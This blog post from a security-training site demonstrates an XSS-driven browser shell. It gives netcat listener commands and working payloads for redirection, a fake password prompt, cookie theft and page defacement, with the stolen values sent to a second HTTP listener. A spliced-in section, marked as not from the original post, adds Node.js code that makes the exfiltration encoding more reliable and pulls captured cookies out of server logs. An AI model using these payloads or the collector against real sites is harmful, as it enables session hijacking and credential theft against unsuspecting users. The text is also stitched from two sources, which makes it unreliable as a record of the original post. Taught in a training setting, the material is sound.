Fun with XSShell

Friday, July 15, 2016

So this is kinda fun. With this page open, copy and paste one of the listener commands below into a terminal window on your local machine. The script embedded in this page polls a listener on your local machine (port 8000) and executes whatever JavaScript the listener returns, so the terminal becomes an interactive shell into this page's browser context. Type alert(42) at the j$ prompt and press "Enter". Once you recover from the initial shock of what you just witnessed, play with the following payloads and spend the next hour of your life thoroughly enjoying yourself.

Listeners

Linux

while :; do printf 'j$ '; read -r c; printf 'HTTP/1.1 200 OK\r\n\r\n%s' "$c" | nc -lp 8000 >/dev/null; done
  • The command is passed to printf as a %s argument and read with -r, so payloads containing % or backslashes reach the page intact instead of being interpreted as a format string or escape sequences.
  • Netcat flag syntax varies by implementation; with the OpenBSD netcat most distributions ship, the OS X form (nc -l 8000) also works.

OS X

while :; do printf 'j$ '; read -r c; printf 'HTTP/1.1 200 OK\r\n\r\n%s' "$c" | nc -l 8000 >/dev/null; done
  • As with the Linux listener, the command is passed as a %s argument and read with -r so that % and backslashes in a payload are not mangled.

Example Payloads

Redirection

window.location = 'https://www.practisec.com/training/'

Phishing

i=new Image();i.src="http://127.0.0.1:8888/pw/"+encodeURIComponent(prompt("Password:"))
  • Requires a second listener, e.g. python -m SimpleHTTPServer 8888 (Python 2) or python3 -m http.server 8888 (Python 3). The request 404s, but the server logs the request line, so the captured value shows up in the listener's output as part of the path.
  • encodeURIComponent keeps characters such as #, ?, & and spaces from being reinterpreted by the URL parser before the request is sent.

Session Hijacking

i=new Image();i.src="http://127.0.0.1:8888/pw/"+encodeURIComponent(document.cookie)
  • Requires a second listener, e.g. python -m SimpleHTTPServer 8888 (Python 2) or python3 -m http.server 8888 (Python 3); the cookie string appears in the logged request path.
  • document.cookie only exposes cookies that were set without the HttpOnly flag, so an HttpOnly session cookie will not be in the capture.
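Both exfiltration payloads above concatenate a captured value into a URL, and the reason they need encodeURIComponent is easy to see once you run the value through the same URL parser the browser applies to i.src: a # in the value starts a fragment, which is never sent, and other reserved characters get reinterpreted. The following is an added example, not code from the original post. It runs under Node.js, builds the exfil URL the way the payloads do (naive and encoded), and parses the value back out of a constructed SimpleHTTPServer-style log line on the listener side; the BASE URL, the sample cookie and the log line are all constructed for the example.

```javascript
// Added example (not from the original post). Node.js; the global WHATWG
// URL class is the same parser a browser applies to an Image's src.

const BASE = "http://127.0.0.1:8888/pw/"; // second listener from the post

// What the listener actually receives when a raw value is concatenated:
// the browser parses the whole string as a URL, so everything after '#'
// becomes a fragment that is never sent, and spaces are re-encoded.
function naivePath(value) {
  return new URL(BASE + value).pathname;
}

// Hardened form of the payload: percent-encode the value so every byte
// of it survives the trip into the request path.
function exfilUrl(value) {
  return BASE + encodeURIComponent(value);
}

// Listener side. SimpleHTTPServer / http.server log the request line to
// stderr even when the path 404s, so the value can be recovered from the
// log. Returns null for lines that are not /pw/ requests or that carry
// malformed percent-encoding (decodeURIComponent throws on those).
const LOG_RE = /"GET \/pw\/([^ "]*) HTTP\/1\.[01]" \d{3}/;
function valueFromLog(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  try {
    return decodeURIComponent(m[1]);
  } catch (e) {
    return null; // bad %-escape; do not let one line crash the collector
  }
}

// Constructed sample: a cookie string with a separator, a space and a '#'.
const SAMPLE_COOKIE = "sid=abc123; theme=dark#debug";

// Constructed log line in the format http.server prints to stderr.
const SAMPLE_LOG =
  '127.0.0.1 - - [15/Jul/2016 10:00:00] "GET /pw/' +
  encodeURIComponent(SAMPLE_COOKIE) +
  ' HTTP/1.1" 404 -';

console.log("naive path :", naivePath(SAMPLE_COOKIE)); // '#debug' is lost
console.log("encoded url:", exfilUrl(SAMPLE_COOKIE));
console.log("recovered  :", valueFromLog(SAMPLE_LOG));
```

The naive path ends at theme=dark; the #debug suffix never leaves the browser. The encoded form arrives as one opaque path segment that decodes back to the original string, which is what the collector on port 8888 needs.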

Defacement

d=document;e=d.createElement("p");e.innerHTML="lanmaster53 wuz here!";d.body.appendChild(e)

Credits

This is all based on the code shared in the following tweets.

Check the source code here ^^^ for the active payload.

Like what you see? Join me for live training! See the Training page for more information.


Please share your thoughts, comments, and suggestions via Twitter.